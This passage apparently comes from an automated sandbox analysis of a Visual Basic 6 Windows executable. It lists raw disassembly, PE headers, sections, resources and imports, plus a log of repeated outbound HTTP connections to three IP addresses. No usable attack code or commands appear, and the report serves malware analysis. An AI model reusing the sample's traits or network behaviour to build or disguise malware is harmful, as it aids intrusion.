                                                                                                                                                          mov ah, F9h
                                                                                                                                                          dec ebx
                                                                                                                                                          mov ah, 26h
                                                                                                                                                          or ebx, esi
                                                                                                                                                          add ebx, ecx
                                                                                                                                                          jle 00007FF9FCEBEB33h
                                                                                                                                                          add dword ptr [eax], eax
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          mov al, byte ptr [B0000000h]
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [ecx], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [esp+esi*2+00h], ch
                                                                                                                                                          add byte ptr [ecx], al
                                                                                                                                                          and byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [ecx], al
                                                                                                                                                          add byte ptr [eax], ah
                                                                                                                                                          and byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [ebp+45h], dh
                                                                                                                                                          js 00007FF9FCEBEC09h
                                                                                                                                                          popad
                                                                                                                                                          je 00007FF9FCEBEC15h
                                                                                                                                                          push 00280000h
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          and byte ptr [eax], al
                                                                                                                                                          inc esp
                                                                                                                                                          into
                                                                                                                                                          jne 00007FF9FCEBEB8Dh
                                                                                                                                                          not byte ptr [ebx+13B942C8h]
                                                                                                                                                          push esp
                                                                                                                                                          push ds
                                                                                                                                                          lea ebp, dword ptr [edx-78h]
                                                                                                                                                          insb
                                                                                                                                                          pop ds
                                                                                                                                                          mov bl, DAh
                                                                                                                                                          mov ebx, 4A9AD4DAh
                                                                                                                                                          test dword ptr [ebx], esi
                                                                                                                                                          sbb al, 68h

                                                                                                                                                          Data Directories

                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x198f40x28.text
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d0000x13f0.rsrc
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x220.text
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                          Sections

                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                          .text0x10000x191d40x1a000e9a068bc69a6cce92101af62753d223aFalse0.35633263221153844data5.734799312113526IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                          .data0x1b0000x180c0x1000620f0b67a91f7f74151bc5be745b7110False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                          .rsrc0x1d0000x13f00x2000ac8be1e82786d7300b7dfd6d7283f6f8False0.1881103515625data3.4247626038178245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                          Resources

                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                          RT_ICON0x1d1300xcd0Device independent bitmap graphic, 32 x 64 x 24, image size 30720.21951219512195122
                                                                                                                                                          RT_GROUP_ICON0x1de000x14data1.15
                                                                                                                                                          RT_VERSION0x1de140x1ecdataEnglishUnited States0.5020325203252033
                                                                                                                                                          RT_MANIFEST0x1e0000x3e7XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.42542542542542544

                                                                                                                                                          Imports

                                                                                                                                                          DLLImport
                                                                                                                                                          MSVBVM60.DLLEVENT_SINK_GetIDsOfNames, _CIcos, _adj_fptan, __vbaStrI4, __vbaVarVargNofree, __vbaFreeVar, __vbaLenBstr, __vbaLateIdCall, __vbaPut3, __vbaEnd, __vbaFreeVarList, _adj_fdiv_m64, EVENT_SINK_Invoke, __vbaRaiseEvent, __vbaFreeObjList, __vbaStrErrVarCopy, _adj_fprem1, __vbaRecAnsiToUni, __vbaCopyBytes, __vbaStrCat, __vbaLsetFixstr, __vbaRecDestruct, __vbaSetSystemError, __vbaHresultCheckObj, __vbaNameFile, _adj_fdiv_m32, Zombie_GetTypeInfo, __vbaAryDestruct, __vbaExitProc, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR4, __vbaStrFixstr, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaGet3, __vbaStrCmp, __vbaGet4, __vbaPutOwner3, __vbaAryConstruct2, __vbaVarTstEq, __vbaI2I4, DllFunctionCall, __vbaFpUI1, __vbaRedimPreserve, __vbaStrR4, _adj_fpatan, __vbaLateIdCallLd, Zombie_GetTypeInfoCount, __vbaRedim, __vbaRecUniToAnsi, EVENT_SINK_Release, __vbaNew, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaGetOwner3, __vbaUbound, __vbaFileSeek, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaAryLock, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaFpI2, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, __vbaR8IntI4, _allmul, _CItan, __vbaAryUnlock, _CIexp, __vbaFreeObj, __vbaFreeStr

                                                                                                                                                          Possible Origin

                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                          EnglishUnited States

                                                                                                                                                          Network Behavior

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Jan 13, 2025 13:17:10.273355961 CET4973080192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:10.278300047 CET804973066.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:10.278367043 CET4973080192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:10.278882027 CET4973080192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:10.283705950 CET804973066.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:11.031574011 CET804973066.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:11.031611919 CET804973066.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:11.031637907 CET4973080192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:11.031687021 CET4973080192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:11.035435915 CET4973080192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:11.035459042 CET4973080192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:12.454052925 CET4973180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:12.458925962 CET804973174.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:12.459001064 CET4973180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:12.459279060 CET4973180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:12.464108944 CET804973174.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:13.192857981 CET804973174.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:13.192903996 CET804973174.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:13.192930937 CET4973180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:13.192972898 CET4973180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:13.193819046 CET4973180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:13.198966026 CET804973174.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:13.199034929 CET4973180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:14.605506897 CET4973280192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:14.610363007 CET804973264.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:14.611661911 CET4973280192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:14.612087965 CET4973280192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:14.616930962 CET804973264.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:15.318314075 CET804973264.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:15.318335056 CET804973264.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:15.318370104 CET4973280192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:15.318403006 CET4973280192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:15.333043098 CET4973280192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:15.333080053 CET4973280192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:16.536665916 CET4973380192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:16.541526079 CET804973366.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:16.541606903 CET4973380192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:16.547116995 CET4973380192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:16.551951885 CET804973366.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:17.276469946 CET804973366.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:17.276489973 CET804973366.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:17.276531935 CET4973380192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:17.276559114 CET4973380192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:17.276916981 CET4973380192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:17.276951075 CET4973380192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:18.621009111 CET4973480192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:18.626791954 CET804973474.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:18.626868963 CET4973480192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:18.631751060 CET4973480192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:18.636667967 CET804973474.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:20.022891045 CET804973474.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:20.022921085 CET804973474.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:20.022932053 CET804973474.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:20.022984982 CET4973480192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:20.022989035 CET804973474.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:20.023015022 CET4973480192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:20.023117065 CET4973480192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:20.023344040 CET804973474.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:20.023379087 CET4973480192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:20.024074078 CET4973480192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:20.024100065 CET4973480192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:20.031030893 CET804973474.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:20.031079054 CET4973480192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:21.409569979 CET4973780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:21.414455891 CET804973764.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:21.414602041 CET4973780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:21.414921999 CET4973780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:21.419744015 CET804973764.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:22.119729996 CET804973764.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:22.119748116 CET804973764.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:22.121726990 CET4973780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:22.358277082 CET4973780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:22.358277082 CET4973780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:23.644738913 CET4974180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:23.656616926 CET804974166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:23.657636881 CET4974180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:23.657912016 CET4974180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:23.662736893 CET804974166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:24.360690117 CET804974166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:24.360723019 CET804974166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:24.360771894 CET4974180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:24.381299973 CET4974180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:24.381320000 CET4974180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:25.935378075 CET4974380192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:25.940207958 CET804974374.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:25.940289974 CET4974380192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:25.950253010 CET4974380192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:25.956165075 CET804974374.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:26.645627975 CET804974374.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:26.645646095 CET804974374.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:26.645723104 CET4974380192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:26.646800995 CET4974380192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:26.646856070 CET4974380192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:28.051990032 CET4974480192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:28.056910038 CET804974464.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:28.057003975 CET4974480192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:28.057588100 CET4974480192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:28.062339067 CET804974464.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:28.780839920 CET804974464.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:28.780858994 CET804974464.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:28.780925035 CET4974480192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:28.780925035 CET4974480192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:28.790503025 CET4974480192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:28.790503979 CET4974480192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:30.111337900 CET4974580192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:30.116281033 CET804974566.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:30.116368055 CET4974580192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:30.200907946 CET4974580192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:30.205930948 CET804974566.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:30.841253042 CET804974566.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:30.841276884 CET804974566.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:30.841345072 CET4974580192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:30.841345072 CET4974580192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:30.841711998 CET4974580192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:30.841711998 CET4974580192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:32.078969955 CET4974680192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:32.083995104 CET804974674.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:32.084130049 CET4974680192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:32.084346056 CET4974680192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:32.089104891 CET804974674.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:32.813036919 CET804974674.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:32.813150883 CET804974674.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:32.813221931 CET4974680192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:32.813877106 CET4974680192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:32.813920021 CET4974680192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:34.121941090 CET4974780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:34.127101898 CET804974764.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:34.127197027 CET4974780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:34.135626078 CET4974780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:34.140441895 CET804974764.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:34.851833105 CET804974764.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:34.851852894 CET804974764.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:34.851898909 CET4974780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:34.852180958 CET4974780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:34.856254101 CET4974780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:34.856254101 CET4974780192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:36.328610897 CET4974880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:36.333559036 CET804974866.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:36.333625078 CET4974880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:36.334028959 CET4974880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:36.338808060 CET804974866.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:37.049127102 CET804974866.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:37.049154043 CET804974866.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:37.049222946 CET4974880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:37.049313068 CET4974880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:37.049741983 CET4974880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:37.049777031 CET4974880192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:38.347934008 CET4974980192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:38.352963924 CET804974974.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:38.353219986 CET4974980192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:38.353219986 CET4974980192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:38.358091116 CET804974974.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:39.069102049 CET804974974.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:39.069123030 CET804974974.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:39.069293022 CET4974980192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:39.069726944 CET4974980192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:39.069726944 CET4974980192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:40.302948952 CET4975080192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:40.309063911 CET804975064.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:40.309159994 CET4975080192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:40.309391975 CET4975080192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:40.314568043 CET804975064.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:41.025130033 CET804975064.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:41.025161028 CET804975064.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:41.025290012 CET4975080192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:41.147157907 CET4975080192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:41.147216082 CET4975080192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:42.481746912 CET4975180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:42.487087965 CET804975166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:42.487173080 CET4975180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:42.487508059 CET4975180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:42.492291927 CET804975166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:43.220982075 CET804975166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:43.221009970 CET804975166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:43.221082926 CET4975180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:43.221514940 CET4975180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:43.221549034 CET4975180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:44.549757957 CET4975280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:44.554712057 CET804975274.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:44.554795980 CET4975280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:44.554965973 CET4975280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:44.559757948 CET804975274.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:45.267776012 CET804975274.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:45.267802000 CET804975274.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:45.267884970 CET4975280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:45.271627903 CET4975280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:45.271652937 CET4975280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:46.777735949 CET4975380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:46.782752037 CET804975364.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:46.782897949 CET4975380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:46.783688068 CET4975380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:46.788564920 CET804975364.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:47.504919052 CET804975364.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:47.504941940 CET804975364.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:47.504975080 CET4975380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:47.505027056 CET4975380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:47.508117914 CET4975380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:47.508147001 CET4975380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:48.596764088 CET4975480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:48.601906061 CET804975466.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:48.601994038 CET4975480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:48.602169037 CET4975480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:48.607023001 CET804975466.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:49.311116934 CET804975466.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:49.311146975 CET804975466.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:49.311348915 CET4975480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:49.442951918 CET4975480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:49.443325996 CET4975480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:49.448141098 CET804975466.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:49.448215008 CET4975480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:50.411776066 CET4975580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:50.418905973 CET804975574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:50.418998003 CET4975580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:50.419233084 CET4975580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:50.424042940 CET804975574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:51.129062891 CET804975574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:51.129125118 CET804975574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:51.129152060 CET4975580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:51.129570007 CET4975580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:51.141045094 CET4975580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:51.141110897 CET4975580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:52.331707001 CET4975680192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:52.336965084 CET804975664.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:52.337047100 CET4975680192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:52.337215900 CET4975680192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:52.342046022 CET804975664.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:53.101898909 CET804975664.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:53.101923943 CET804975664.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:53.101998091 CET4975680192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:53.102623940 CET4975680192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:53.102683067 CET4975680192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:54.065152884 CET4975780192.168.2.466.102.1.82
